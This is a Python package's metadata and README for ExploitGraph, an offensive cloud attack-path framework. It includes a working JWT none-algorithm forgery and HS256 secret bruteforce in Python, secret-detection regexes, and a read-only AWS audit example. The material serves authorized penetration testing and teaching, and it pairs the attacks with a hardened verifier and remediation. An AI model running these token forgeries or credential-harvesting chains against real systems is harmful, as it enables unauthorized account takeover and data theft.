Metadata-Version: 2.4
Name: exploitgraph
Version: 1.0.3
Summary: Automated attack path discovery and exploitation framework for cloud-native applications
Author-email: Prajwal Pawar <prajwal@exploitgraph.io>
License: MIT
Project-URL: Homepage, https://github.com/prajwalpawar/ExploitGraph
Project-URL: Repository, https://github.com/prajwalpawar/ExploitGraph
Project-URL: Bug Tracker, https://github.com/prajwalpawar/ExploitGraph/issues
Project-URL: Documentation, https://github.com/prajwalpawar/ExploitGraph/wiki
Keywords: security,pentesting,cloud,aws,attack-path,exploitation
Classifier: Development Status :: 4 - Beta
Classifier: Intended Audience :: Information Technology
Classifier: Topic :: Security
Classifier: License :: OSI Approved :: MIT License
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Environment :: Console
Classifier: Operating System :: POSIX :: Linux
Classifier: Operating System :: MacOS
Requires-Python: >=3.9
Description-Content-Type: text/markdown
License-File: LICENSE
Requires-Dist: requests>=2.31.0
Requires-Dist: colorama>=0.4.6
Requires-Dist: networkx>=3.2.0
Requires-Dist: jinja2>=3.1.2
Requires-Dist: PyJWT>=2.8.0
Requires-Dist: python-dotenv>=1.0.0
Requires-Dist: tabulate>=0.9.0
Requires-Dist: pyyaml>=6.0
Provides-Extra: aws
Requires-Dist: boto3>=1.34.0; extra == "aws"
Requires-Dist: botocore>=1.34.0; extra == "aws"
Provides-Extra: dev
Requires-Dist: pytest>=7.0; extra == "dev"
Requires-Dist: black>=23.0; extra == "dev"
Requires-Dist: flake8>=6.0; extra == "dev"
Requires-Dist: mypy>=1.0; extra == "dev"
Provides-Extra: all
Requires-Dist: exploitgraph[aws,dev]; extra == "all"
Dynamic: license-file

# ExploitGraph

<div align="center">

```
███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗ ██████╗ ██████╗  █████╗ ██████╗ ██╗  ██╗
██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝██╔════╝ ██╔══██╗██╔══██╗██╔══██╗██║  ██║
█████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║   ██║  ███╗██████╔╝███████║██████╔╝███████║
██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║   ██║   ██║██╔══██╗██╔══██║██╔═══╝ ██╔══██║
███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║   ╚██████╔╝██║  ██║██║  ██║██║     ██║  ██║
╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝    ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝     ╚═╝  ╚═╝
```

**Automated Attack Path Discovery & Exploitation Framework**

[![Python](https://img.shields.io/badge/Python-3.9%2B-blue?logo=python)](https://python.org)
[![License](https://img.shields.io/badge/License-MIT-green)](LICENSE)
[![Platform](https://img.shields.io/badge/Platform-Linux%20%7C%20macOS-lightgrey)](https://github.com/prajwalpawar/ExploitGraph)
[![Modules](https://img.shields.io/badge/Modules-8%2B-red)](modules/)
[![AWS](https://img.shields.io/badge/AWS-Cloud%20Security-orange?logo=amazon-aws)](modules/cloud/)

</div>

---

## What is ExploitGraph?

ExploitGraph is a **modular, open-source attack path discovery framework** that chains cloud misconfigurations, exposed secrets, and application vulnerabilities into a complete kill chain, starting from **zero prior knowledge** of the target: no credentials, just a URL.

Unlike tools that need credentials up front (Pacu) or only audit configurations (Prowler/ScoutSuite), ExploitGraph **starts from nothing** and discovers what it needs as it goes, feeding each stage's output (an exposed bucket, a leaked key, a reachable admin API) into the next:

```
Cloud Misconfiguration → Data Exposure → Secret Leakage → API Abuse → Full Compromise
```

Every step is visualized as an interactive attack graph with MITRE ATT&CK mappings and AWS remediation commands.

### How it differs from existing tools

| Tool | Starting Point | Output | Attack Chain |
|------|---------------|--------|--------------|
| **Pacu** | Needs IAM credentials | Module results | No chaining |
| **Prowler** | Needs AWS credentials | Audit findings | No chaining |
| **ScoutSuite** | Needs AWS credentials | Config report | No chaining |
| **TruffleHog** | Git repo / S3 bucket | Secret list | No chaining |
| **ExploitGraph** | **Just a URL** | **Full kill chain + visual graph** | **Automated** |

---

## Features

- **msfconsole-style interactive shell** with tab completion
- **8+ modular attack modules** across discovery, cloud, secrets, exploitation, reporting
- **Generic — works against any target** (not limited to fintech or specific apps)
- **Wordlist-driven discovery** — no hardcoded paths
- **20+ secret patterns** including AWS keys, JWT secrets, Stripe keys, GitHub tokens
- **Optional boto3 AWS integration** — real S3 ACL checks, IAM enumeration, MFA detection
- **JWT attack engine** — none-algorithm bypass, weak secret bruteforce
- **Interactive D3.js attack graph** in HTML report
- **CVSS scoring** per finding + session risk score (0-10)
- **MITRE ATT&CK for Cloud** mapping
- **Multi-session SQLite persistence** — resume scans across sessions
- **Offensive and defensive modes**
- **pip-installable** Python package

---

## Installation

### Quick Start
```bash
git clone https://github.com/prajwalpawar/ExploitGraph.git
cd ExploitGraph
pip install -r requirements.txt
python3 exploitgraph.py
```

### With AWS Support
The cloud modules need boto3, which the package metadata declares as the `aws` extra:
```bash
pip install -r requirements.txt
pip install boto3 botocore
# equivalent: install the package in place with the extra
pip install -e ".[aws]"
```

### Requirements
- Python 3.9+
- Linux / macOS (Kali Linux recommended)
- No AWS credentials required for HTTP-mode scanning; `cloud/iam_enum` and the boto3 checks in `cloud/s3_enum` need either an AWS CLI profile or keys recovered earlier in the scan (see AWS Integration below)
---

## Usage

### Interactive Console
```bash
python3 exploitgraph.py
```

```
exploitgraph> workspace new pentest http://target.com
exploitgraph> run auto
```

### CLI Mode
```bash
# Full automated attack chain
python3 exploitgraph.py -t http://target.com --auto

# Single module
python3 exploitgraph.py -t http://target.com -m cloud/s3_enum

# Defensive audit mode (no exploitation)
python3 exploitgraph.py -t http://target.com --mode defensive --auto

# List all modules
python3 exploitgraph.py --list-modules
```

### Console Commands
```
SESSION
  workspace new <name> <url>    Create workspace
  set TARGET http://target.com  Set target
  set MODE offensive|defensive  Set mode

MODULES
  show modules                  List all modules by category
  use discovery/http_enum       Select a module
  options                       Show module options
  set OPTION value              Configure option
  run                           Execute module
  run auto                      Full attack chain
  back                          Deselect module

INFORMATION
  show findings                 Security findings
  show secrets                  Extracted credentials
  show attack-path              ASCII kill chain
  show summary                  Risk score + stats
  info <module>                 Module details
  search <keyword>              Search modules

OUTPUT
  export html                   HTML report with D3.js graph
  export json                   JSON for SIEM integration
  export all                    All formats

SESSION MANAGEMENT
  sessions                      List sessions
  sessions -i <id>              Switch session
  sessions -k <id>              Kill session
```

---

## Modules

### Discovery
| Module | Description | MITRE |
|--------|-------------|-------|
| `discovery/http_enum` | Wordlist-driven endpoint enumeration + tech fingerprinting | T1595.003 |

### Cloud
| Module | Description | MITRE |
|--------|-------------|-------|
| `cloud/s3_enum` | S3 bucket discovery, public ACL detection, file download + boto3 audit | T1530 |
| `cloud/iam_enum` | IAM user/role enumeration, MFA checks, policy analysis (requires boto3) | T1580, T1078.004 |

### Secrets
| Module | Description | MITRE |
|--------|-------------|-------|
| `secrets/file_secrets` | 20+ pattern regex scanner + Shannon entropy detection | T1552.001 |

### Exploitation
| Module | Description | MITRE |
|--------|-------------|-------|
| `exploitation/api_exploit` | Generic credential testing, admin access, privilege escalation | T1078.004 |
| `exploitation/jwt_attack` | None-algorithm bypass, weak secret bruteforce, algorithm confusion | T1078, T1550.001 |
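
The two attacks in the `jwt_attack` row, as an added example that is not the module's own code: a none-algorithm forgery and a wordlist bruteforce of an HS256 secret, done with only the standard library (no PyJWT), next to a verifier that trusts the token's `alg` header and one that pins the algorithm and therefore rejects the forgery. Algorithm confusion (RS256 to HS256) is not shown. The secret, the claims and the wordlist are constructed for this example.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional

# Added example, not ExploitGraph's jwt_attack module. SECRET, the claims and
# WORDLIST are constructed; a real run would take the wordlist from data/wordlists/.
SECRET = b"secret123"
WORDLIST = ["password", "admin", "changeme", "secret123", "letmein"]


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def encode_part(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Issue a normal HS256 token, as the target application would."""
    signing_input = encode_part({"alg": "HS256", "typ": "JWT"}) + "." + encode_part(payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def forge_none(token: str, **changes) -> str:
    """None-algorithm bypass: reuse the claims, set alg=none, send an empty signature."""
    _, p, _ = token.split(".")
    payload = json.loads(b64url_decode(p))
    payload.update(changes)                      # e.g. role="admin"
    return encode_part({"alg": "none", "typ": "JWT"}) + "." + encode_part(payload) + "."


def bruteforce_hs256(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Weak-secret bruteforce: recompute the HMAC per candidate until one matches."""
    h, p, s = token.split(".")
    signing_input = f"{h}.{p}".encode()
    target = b64url_decode(s)
    for candidate in wordlist:
        mac = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return candidate
    return None


def verify_lenient(token: str, secret: bytes) -> Optional[dict]:
    """Vulnerable verifier: honours whatever alg the token names, including none."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg == "none":
        return json.loads(b64url_decode(p))      # signature never checked
    if alg == "HS256":
        expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(s)):
            return json.loads(b64url_decode(p))
    return None


def verify_strict(token: str, secret: bytes) -> Optional[dict]:
    """Hardened verifier: the algorithm is pinned server-side, so alg=none cannot pass."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


if __name__ == "__main__":
    token = sign_hs256({"sub": "user42", "role": "user"}, SECRET)
    forged = forge_none(token, role="admin")
    print("lenient accepts forged token:", verify_lenient(forged, SECRET))
    print("strict accepts forged token: ", verify_strict(forged, SECRET))
    print("recovered secret:", bruteforce_hs256(token, WORDLIST))
```

`verify_lenient` is the bug the none bypass relies on: it takes the algorithm from attacker-controlled input. Current JWT libraries reject `none` unless it is explicitly enabled, but hand-rolled verifiers still make this mistake. A pinned algorithm plus a secret long enough to be outside any wordlist closes both attacks.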

### Reporting
| Module | Description |
|--------|-------------|
| `reporting/html_report` | Interactive HTML report with D3.js attack graph, CVSS scores, MITRE mapping |
| `reporting/json_export` | Structured JSON for SIEM/ticketing integration |

---

## Secret Patterns (20+)

The `secrets/file_secrets` module matches credential types including the following. The right-hand column is the shape each rule looks for; the last entry is the entropy fallback that flags long random-looking strings no named pattern covers:

```
AWS Access Key ID          AKIA[0-9A-Z]{16}
AWS Secret Access Key      aws_secret_access_key = ...
JWT Secret                 jwt_secret_key = ...
Generic API Key            api_key = ...
Stripe Live Key            sk_live_...
GitHub Token               ghp_...
Google API Key             AIza...
SendGrid API Key           SG....
Slack Token                xox[baprs]-...
Database Password          db_password = ...
Database URL               postgresql://user:pass@host
Private Key                -----BEGIN RSA PRIVATE KEY-----
Bearer Token               Authorization: Bearer ...
Encryption Key             aes_key = [hex]
Admin Credentials          admin password = ...
Twilio SID                 AC[a-z0-9]{32}
Webhook Secret             webhook_secret = ...
High-Entropy Strings       Shannon entropy > 4.5 bits per character
```
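
How the two detection mechanisms above fit together, as an added example that is not the `file_secrets` module's own code: a regex pass over each line using approximations of the listed patterns, then a Shannon-entropy pass over any remaining long token on that line, with the 4.5 bits/char threshold the README states. The `PATTERNS` regexes, `scan_text`, and the sample `.env` are this example's own (the AWS values are the placeholder keys from AWS's documentation).

```python
import math
import re
from dataclasses import dataclass
from typing import Dict, List

# Added example, not ExploitGraph's file_secrets module. Pattern names follow the
# table above; the regexes are this example's own approximations of the listed
# shapes, and 4.5 bits/char is the entropy threshold the README gives.
PATTERNS = {
    "AWS Access Key ID":     re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "AWS Secret Access Key": re.compile(r"aws_secret_access_key\s*[=:]\s*['\"]?([A-Za-z0-9/+=]{40})", re.I),
    "JWT Secret":            re.compile(r"jwt_secret(?:_key)?\s*[=:]\s*['\"]?([^\s'\"]+)", re.I),
    "Generic API Key":       re.compile(r"\bapi_key\s*[=:]\s*['\"]?([^\s'\"]{16,})", re.I),
    "Stripe Live Key":       re.compile(r"\bsk_live_[0-9A-Za-z]{16,}\b"),
    "GitHub Token":          re.compile(r"\bghp_[0-9A-Za-z]{36}\b"),
    "Slack Token":           re.compile(r"\bxox[baprs]-[0-9A-Za-z-]{10,}\b"),
    "Database URL":          re.compile(r"\b(?:postgres(?:ql)?|mysql|mongodb)://[^:\s/]+:[^@\s]+@[^\s'\"]+", re.I),
    "Private Key":           re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "Twilio SID":            re.compile(r"\bAC[a-z0-9]{32}\b"),
}
ENTROPY_THRESHOLD = 4.5                              # bits per character
CANDIDATE = re.compile(r"[A-Za-z0-9+/_\-]{20,}")     # tokens long enough to be a key


@dataclass
class Secret:
    kind: str
    value: str
    line: int


def shannon_entropy(s: str) -> float:
    """Bits per character. The maximum is log2 of the number of distinct characters,
    so a 20-character string tops out at 4.32 and clearing 4.5 needs 23+ distinct chars."""
    if not s:
        return 0.0
    n = len(s)
    counts: Dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def scan_text(text: str) -> List[Secret]:
    """Regex pass first, then entropy over leftover long tokens on the same line."""
    found: List[Secret] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue
        known = []
        for kind, rx in PATTERNS.items():
            for m in rx.finditer(line):
                value = m.group(1) if m.groups() else m.group(0)   # captured value or whole match
                found.append(Secret(kind, value, lineno))
                known.append(value)
        for token in CANDIDATE.findall(line):
            if any(token in v or v in token for v in known):
                continue                                          # already reported by a regex
            if shannon_entropy(token) > ENTROPY_THRESHOLD:
                found.append(Secret("High-Entropy String", token, lineno))
    return found


# Constructed sample .env; the AWS values are the placeholder keys from AWS's own docs.
SAMPLE_ENV = """\
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
JWT_SECRET_KEY=changeme
DATABASE_URL=postgresql://app:hunter2@db.internal:5432/fintech
SESSION_SIGNING_KEY=Qm7xPz2LkT9vRa4HwE6bYc1NuJ3sFd8G
DEBUG=true
"""

if __name__ == "__main__":
    for s in scan_text(SAMPLE_ENV):
        print(f"line {s.line}: {s.kind}: {s.value}")
```

The entropy pass is what catches `SESSION_SIGNING_KEY` in the sample, which no named pattern mentions; the regex results are excluded from it so the AWS secret is not reported twice. Note the threshold's arithmetic: a short token can never reach 4.5 bits/char, which is why the candidate regex insists on 20+ characters and why an 8-character password like `changeme` is only ever found by a named pattern.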

---

## MITRE ATT&CK for Cloud Coverage

| Technique | Name | Module |
|-----------|------|--------|
| T1595.003 | Wordlist Scanning | http_enum |
| T1580 | Cloud Infrastructure Discovery | s3_enum, iam_enum |
| T1530 | Data from Cloud Storage | s3_enum |
| T1552.001 | Credentials in Files | file_secrets |
| T1552.005 | Cloud Instance Metadata API | file_secrets |
| T1078.004 | Valid Accounts: Cloud Accounts | api_exploit, iam_enum |
| T1548 | Abuse Elevation Control Mechanism | api_exploit |
| T1550.001 | Application Access Token | jwt_attack |

---

## Demo: Vulnerable Target (Viva/Lab Use)

A deliberately vulnerable Flask fintech application is included for demonstration:

```bash
# Terminal 1 — Start target
cd target && python3 app.py
# Running at http://127.0.0.1:5000

# Terminal 2 — Attack it
python3 exploitgraph.py -t http://127.0.0.1:5000 --auto
```

The target simulates:
- Public S3 bucket with backup archive
- `.env` file with exposed AWS keys, API keys, JWT secrets
- Weak admin credentials in deployment notes
- Unauthenticated admin API endpoints
- Debug endpoint leaking configuration

> **The target app is for controlled lab environments only.**

---

## Writing Custom Modules

Create a file in `modules/custom/my_module.py`:

```python
from modules.base import BaseModule, ModuleResult

class MyModule(BaseModule):
    NAME        = "my_module"
    DESCRIPTION = "My custom scanner"
    CATEGORY    = "discovery"
    SEVERITY    = "HIGH"
    MITRE       = ["T1595"]

    OPTIONS = {
        "TARGET": {"default": "", "required": True, "description": "Target URL"},
    }

    def run(self, session):
        target = self.get_option("TARGET")
        # ... your logic ...
        session.add_finding(
            module="my_module",
            title="Finding Title",
            severity="HIGH",
            description="What was found",
            evidence="Proof",
            recommendation="How to fix",
            cvss_score=7.5,
        )
        return ModuleResult(True, {"found": True})
```

ExploitGraph automatically discovers and loads it. No configuration needed.

---

## Report Output

The HTML report includes:
- Executive summary with severity breakdown
- Interactive D3.js attack graph (drag, zoom, hover for details)
- Expandable findings with CVSS scores
- Evidence + proof-of-concept per finding
- AWS CLI remediation commands
- MITRE ATT&CK technique mapping
- Full secrets table
- Exploitation evidence log
- Session risk score (0-10)

---

## AWS Integration

With boto3 installed and credentials configured (an AWS CLI profile, or keys recovered by `file_secrets` during the scan):

```
# Using AWS CLI profile
exploitgraph> use cloud/s3_enum
exploitgraph> set AWS_PROFILE my-profile
exploitgraph> run

# Using discovered credentials (auto-populated from file_secrets)
exploitgraph> use cloud/iam_enum
exploitgraph> run   # Picks up AWS keys found by file_secrets automatically
```

**All AWS operations are READ-ONLY**: nothing in the AWS environment is modified. Two things to keep in mind: read-only calls (`GetBucketAcl`, `ListUsers` and the like) are still recorded as CloudTrail management events, so the account owner can see the scan, and using keys recovered from a target, even read-only, must stay inside the scope of the authorized engagement.
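
The read-only checks behind `cloud/s3_enum` and `cloud/iam_enum` (public bucket ACLs, users without MFA), as an added example that is not ExploitGraph's own code. The decision logic is kept apart from the API calls so it runs on the constructed responses below without AWS access; `audit_live` wraps the same logic in a boto3 pass that uses only Get/List calls. `public_grants`, `users_without_mfa`, `remediation`, `audit_live` and the sample responses are this example's own names and data.

```python
from typing import Dict, Iterable, List, Optional, Tuple

# Added example, not ExploitGraph's s3_enum/iam_enum code. ACL_SAMPLE, USERS_SAMPLE
# and MFA_SAMPLE are constructed, shaped like the boto3 responses for
# s3.get_bucket_acl, iam.list_users and iam.list_mfa_devices.

PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "anyone on the internet",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account",
}


def public_grants(acl: dict) -> List[Tuple[str, str]]:
    """(who, permission) for every grant to one of the two public S3 groups."""
    hits = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        uri = grantee.get("URI")
        if grantee.get("Type") == "Group" and uri in PUBLIC_GROUPS:
            hits.append((PUBLIC_GROUPS[uri], grant["Permission"]))
    return hits


def remediation(bucket: str) -> str:
    """AWS CLI command that turns on Block Public Access for the bucket."""
    return (f"aws s3api put-public-access-block --bucket {bucket} "
            "--public-access-block-configuration "
            "BlockPublicAcls=true,IgnorePublicAcls=true,"
            "BlockPublicPolicy=true,RestrictPublicBuckets=true")


def users_without_mfa(users: Iterable[dict], mfa_devices: Dict[str, list]) -> List[str]:
    """User names with no MFA device registered."""
    return [u["UserName"] for u in users if not mfa_devices.get(u["UserName"])]


def audit_live(profile: Optional[str] = None) -> dict:
    """Live audit using only Get/List calls, so nothing is modified (the calls are
    still logged by CloudTrail). Needs boto3, hence the import inside the function."""
    import boto3
    from botocore.exceptions import ClientError

    session = boto3.Session(profile_name=profile)
    s3, iam = session.client("s3"), session.client("iam")
    report = {"public_buckets": {}, "acl_errors": {}, "users_without_mfa": []}
    for bucket in s3.list_buckets()["Buckets"]:
        name = bucket["Name"]
        try:
            hits = public_grants(s3.get_bucket_acl(Bucket=name))
        except ClientError as exc:                      # e.g. AccessDenied on this bucket
            report["acl_errors"][name] = exc.response["Error"]["Code"]
            continue
        if hits:
            report["public_buckets"][name] = {"grants": hits, "fix": remediation(name)}
    users = [u for page in iam.get_paginator("list_users").paginate() for u in page["Users"]]
    devices = {u["UserName"]: iam.list_mfa_devices(UserName=u["UserName"])["MFADevices"]
               for u in users}
    report["users_without_mfa"] = users_without_mfa(users, devices)
    return report


# Constructed samples: a bucket ACL that grants READ to everyone, and two users of
# whom only alice has an MFA device (the account ID is AWS's documentation placeholder).
ACL_SAMPLE = {
    "Owner": {"ID": "owner-canonical-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"},
    ],
}
USERS_SAMPLE = [{"UserName": "alice"}, {"UserName": "bob"}]
MFA_SAMPLE = {"alice": [{"SerialNumber": "arn:aws:iam::123456789012:mfa/alice"}], "bob": []}

if __name__ == "__main__":
    for who, perm in public_grants(ACL_SAMPLE):
        print(f"bucket readable by {who} ({perm}); fix: {remediation('backups')}")
    print("users without MFA:", users_without_mfa(USERS_SAMPLE, MFA_SAMPLE))
```

An ACL grant to `AllUsers` or `AuthenticatedUsers` is the signal for a public bucket; `AuthenticatedUsers` is often misread as "my users" but means any AWS account in the world. Bucket policies are a second path to public exposure that an ACL check alone does not cover, which is why the remediation turns on all four Block Public Access settings rather than editing the ACL.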

---

## Architecture

```
ExploitGraph/
├── exploitgraph.py          Entry point (CLI + console launcher)
├── core/
│   ├── console.py           msfconsole-style interactive shell
│   ├── module_loader.py     Dynamic plugin discovery & loading
│   ├── session_manager.py   SQLite-backed multi-session tracking
│   ├── attack_graph.py      networkx attack graph engine
│   ├── risk_engine.py       CVSS-style risk scoring
│   ├── logger.py            Structured colored logger
│   └── config.py            YAML configuration loader
├── modules/
│   ├── base.py              BaseModule abstract class
│   ├── discovery/           HTTP enumeration modules
│   ├── cloud/               AWS/cloud security modules
│   ├── secrets/             Credential extraction modules
│   ├── exploitation/        Attack execution modules
│   ├── reporting/           Report generation modules
│   └── custom/              Drop your own modules here
├── data/wordlists/          Attack wordlists
├── sessions/                SQLite session database
├── reports/                 Generated reports
└── target/                  Demo vulnerable application
```

---

## Legal Disclaimer

ExploitGraph is developed for **authorized security testing and educational purposes only**.

- Only use against systems you own or have explicit written permission to test
- The demo target application is for isolated lab environments only
- Unauthorized use against third-party systems is illegal

The author assumes no liability for misuse of this tool.

---

## License

MIT License — see [LICENSE](LICENSE)

---

## Author

**Prajwal Pawar**
B.Sc. Cyber Security — Final Year Project
School of Computer Application

---

## Contributing

Contributions welcome! See [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines.

The easiest contribution: write a new module in `modules/custom/` following the `BaseModule` pattern and submit a PR.
